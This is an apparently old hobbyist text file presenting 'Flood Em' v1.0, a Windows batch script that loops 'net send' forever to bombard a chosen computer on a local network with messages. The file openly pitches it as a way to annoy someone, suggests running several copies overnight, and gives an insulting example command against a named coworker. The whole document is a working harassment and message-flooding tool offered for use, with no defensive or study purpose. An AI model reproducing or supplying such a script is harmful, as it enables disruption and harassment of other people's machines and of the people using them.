Flood Em' v1.0 - a net send flood batch file

Wanna piss someone in your network off? Flood their computers with net send
messages using this simple and fun batch file.
Open as many console windows, run floodem, and leave it on for the night.
:)

-----------------------

@ECHO OFF

IF %1.==. GOTO NP
IF %2.==. GOTO NP
GOTO FLOOD

:NP
ECHO -------------------------------------
ECHO - Flood Em' v1.0 -
echo -------------------------------------
ECHO "Syntax : floodem <victim> <message>"
ECHO -------------------------------------
ECHO - Have fun ;) -
ECHO - - JH -
ECHO -------------------------------------

GOTO END

:FLOOD
ECHO.
ECHO Press CTRL-BREAK to quit
PAUSE

:FLOODLOOP
net SEND %1 %2
GOTO FLOODLOOP

:END

----------------------->
Example :
Lets say you have some guy on the network, and his computer name is Barney
...

floodem barney you're such a purple piece of sh*t


Credits

By JunHaan.
